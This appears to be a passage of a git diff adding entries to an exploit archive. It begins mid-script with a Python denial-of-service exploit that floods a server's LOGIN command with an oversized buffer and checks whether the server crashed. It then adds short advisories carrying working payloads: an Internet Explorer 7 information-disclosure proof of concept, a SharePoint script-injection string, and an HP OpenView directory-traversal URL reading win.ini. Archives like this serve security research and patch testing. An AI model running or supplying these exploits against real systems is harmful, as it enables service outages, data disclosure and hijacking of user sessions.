+HOST    = options.HOST
+PORT    = options.PORT
+if not (HOST and PORT):
+   parser.print_help()
+   sys.exit()
+
+payload = 'A'*225
+print "[+] Connecting to %s on port %d" % (HOST, PORT)
+print "[+] Preparing for DoS..."
+s = socket(AF_INET, SOCK_STREAM)
+s.connect((HOST, PORT))
+print s.recv(1024)
+s.send('0001 LOGIN ' + payload + ' "\r\n')
+s.close()
+print "[+] Evil buf sent!"
+print "[+] Let's wait 5 secs and see if the server crashed..."
+time.sleep(5)
+try:
+   s = socket(AF_INET, SOCK_STREAM)
+   s.connect((HOST, PORT))
+except error,e:
+   print "[+] Server Di3d: ", e[1]
+   print "[+] The attack was successful!"
+else:
+   print "[-] Attack was not successful!"
+   s.close()
diff --git a/platforms/windows/remote/31624.txt b/platforms/windows/remote/31624.txt
new file mode 100755
index 000000000..0153e83a0
--- /dev/null
+++ b/platforms/windows/remote/31624.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/28667/info
+
+Microsoft Internet Explorer is prone to an information-disclosure vulnerability.
+
+An attacker can exploit this issue to obtain potentially sensitive information from the local computer. Information obtained may aid in further attacks.
+
+This issue affects Internet Explorer 7. Reportedly, Internet Explorer 8 is not vulnerable, but this has not been confirmed.
+
+This issue may be related to the vulnerability discussed in BID 28581 (Microsoft Internet Explorer 'ieframe.dll' Script Injection Vulnerability).
+
+<?php header("location: res://ieframe.dll/24/123"); ?> <script> var xml = new XMLHttpRequest(); xml.open("GET","/the_header_file.php"); xml.onreadystatechange=function (){ if (xml.readyState == 4){ alert(xml.responseText) } } xml.send(null); </script> 
\ No newline at end of file
diff --git a/platforms/windows/remote/31632.txt b/platforms/windows/remote/31632.txt
new file mode 100755
index 000000000..44cec2437
--- /dev/null
+++ b/platforms/windows/remote/31632.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28706/info
+
+Microsoft SharePoint Server is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input data. Note that to perform attacks, an attacker requires access to a user account with sufficient privileges to edit pages.
+
+Exploiting this issue may allow the attacker to execute HTML and script code in the context of the affected site, to steal cookie-based authentication credentials, or to control how the site is rendered to the user; other attacks are also possible.
+
+Microsoft SharePoint Server 2.0 is vulnerable; other versions may also be affected.
+
+"""></P></div></td><script>[your javascript here]</script> 
\ No newline at end of file
diff --git a/platforms/windows/remote/31638.txt b/platforms/windows/remote/31638.txt
new file mode 100755
index 000000000..356626615
--- /dev/null
+++ b/platforms/windows/remote/31638.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/28745/info
+
+HP OpenView Network Node Manager is prone to multiple vulnerabilities affecting the 'ovalarmsrv.exe' and 'ovtopmd.exe' processes. These issues include a directory-traversal issue and multiple denial-of-service issues.
+
+UPDATE (April 14, 2008): Secunia Research discovered, independently, that the 'OpenView5.exe' process is also prone to the directory-traversal issue; this affects Network Node Manager 7.51. Note that 'ovalarmsrv.exe' may also be named 'OpenView5.exe'.
+
+Attackers can exploit these issues to access potentially sensitive data on the affected computer or to deny service to legitimate users.
+
+HP OpenView Network Node Manager 7.53 is vulnerable; other versions may also be affected.
+
+http://www.example.com/OvCgi/OpenView5.exe?Target=Main&Action=../../../../../../windows/win.ini